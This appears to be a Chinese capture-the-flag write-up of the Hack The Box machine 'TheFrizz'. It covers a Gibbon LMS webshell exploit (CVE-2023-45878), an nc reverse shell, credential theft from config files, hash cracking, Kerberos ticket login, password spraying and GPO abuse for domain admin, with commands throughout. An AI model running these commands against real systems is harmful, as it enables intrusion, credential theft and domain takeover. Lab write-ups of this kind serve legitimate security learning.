HTB打靶记录-TheFrizz

信息收集

nmap -sV -sC -O 10.10.11.60

1. Nmap scan report for 10.10.11.60
2. Host is up (0.63s latency).
3. Not shown: 987 filtered tcp ports (no-response)
4. PORT     STATE SERVICE       VERSION
5. 22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
6. 53/tcp   open  domain        Simple DNS Plus
7. 80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
8. |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
9. |_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
10. 88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)
11. 135/tcp  open  msrpc         Microsoft Windows RPC
12. 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
13. 389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
14. 445/tcp  open  microsoft-ds?
15. 464/tcp  open  kpasswd5?
16. 593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
17. 636/tcp  open  tcpwrapped
18. 3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
19. 3269/tcp open  tcpwrapped
20. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
21. Device type: general purpose
22. Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
23. OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
24. Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
25. No exact OS matches for host (test conditions non-ideal).
26. Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
28. Host script results:
29. | smb2-security-mode:
30. |   3:1:1:
31. |_    Message signing enabled and required
32. |_clock-skew: 6h40m55s
33. | smb2-time:
34. |   date: 2025-04-06T16:59:55
35. |_  start_date: N/A
37. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
38. Nmap done: 1 IP address (1 host up) scanned in 170.30 seconds

复制代码

CVE-2023-45878

有个web服务，搜一下有cve，可以读sql文件
http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql
没用，继续搜，CVE-2023-45878，写webshell

蚁剑连接，传个nc.exe上去反连
net user /domain

1. a.perlstein
2. Administrator
3. c.ramon
4. c.sandiego
5. d.hudson
6. f.frizzle
7. g.frizzle
8. Guest
9. h.arm
10. J.perlstein
11. k.franklin
12. krbtgt
13. l.awesome
14. m.ramon
15. M.SchoolBus
16. p.terese
17. r.tennelli
18. t.wright
19. v.frizzle
20. w.li
21. w.Webservice

复制代码

mysql

查看config.php内容，拿到mysql账号密码

1. $databaseServer = 'localhost';
2. $databaseUsername = 'MrGibbonsDB';
3. $databasePassword = 'MisterGibbs!Parrot!?1';
4. $databaseName = 'gibbon';

复制代码

使用frp把3306端口代理出来，用navicat连接，查看gibbonperson表，拿到密码和盐值
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
john爆破
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
拿到密码：***********
因为没开5985端口，所以不能通过winrm登录，这里通过获取f.frizzle票据通过ssh去登录
Kerberos认证

修改/etc/krb5.conf

1. [libdefaults]
2.         default_realm = FRIZZ.HTB
4. # The following krb5.conf variables are only for MIT Kerberos.
5.         kdc_timesync = 1
6.         ccache_type = 4
7.         forwardable = true
8.         proxiable = true
9.         rdns = false
12. # The following libdefaults parameters are only for Heimdal Kerberos.
13.         fcc-mit-ticketflags = true
15. [realms]
16.     FRIZZ.HTB = {
17.         kdc = frizzdc.frizz.htb
18.         admin_server = frizzdc.firzz.htb
19.         default_domain = frizz.htb
20.     }
22. [domain_realm]
23.     .frizz.htb = FRIZZ.HTB
24.     frizz.htb = FRIZZ.HTB

复制代码

kinit f.frizzle@FRIZZ.HTB 去请求票据
klist 查看票据

ssh f.frizzle@frizz.htb -K 通过票据去登录，读取desktop/user.txt
bloodhound

一直超时，我cnm，只好传个SharpHound.exe上去收集，卡到怀疑人生，最后通过nc将压缩包传回kali
分析f.frizzle的域关系网，什么都没有。废物用户，回收站翻到一个压缩包

通过nc传输，等了半天，解压缩找密码
grep -IR "wapt_password"，为什么这么找？因为文件名是这个，直接搜password太多了
拿到密码：!suBcig@MehTed!R
密码喷洒一下，kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'

是M.SchoolBus的，ssh连上去

这环境shi一样，接下来说思路，bloodhound查看M.SchoolBus的关系网

M.SchoolBus属于GPCO组，说明M.SchoolBus可以打GPO Abuse，写一个恶意GPO进去来进行提权

1. // 创建恶意GOP
2. New-GPO -Name "hacker"
3. // 链接GPO到域控制器
4. New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
5. // 将M.SchoolBus加入域管理员组
6. .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
7. // 刷新GPO
8. gpupdate /force

复制代码

结束

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！